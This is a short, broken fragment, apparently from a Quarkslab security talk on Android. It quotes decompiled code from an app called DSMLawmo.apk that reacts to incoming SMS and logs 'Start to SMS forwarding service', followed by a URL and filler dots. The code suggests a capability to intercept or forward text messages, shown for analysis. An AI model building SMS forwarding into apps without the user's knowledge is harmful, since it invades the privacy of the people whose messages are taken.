DSMLawmo.apk seems to have an interesting functionality...[...]if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction())){
Util.Logd("Start to SMS forwarding service");[...]^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android in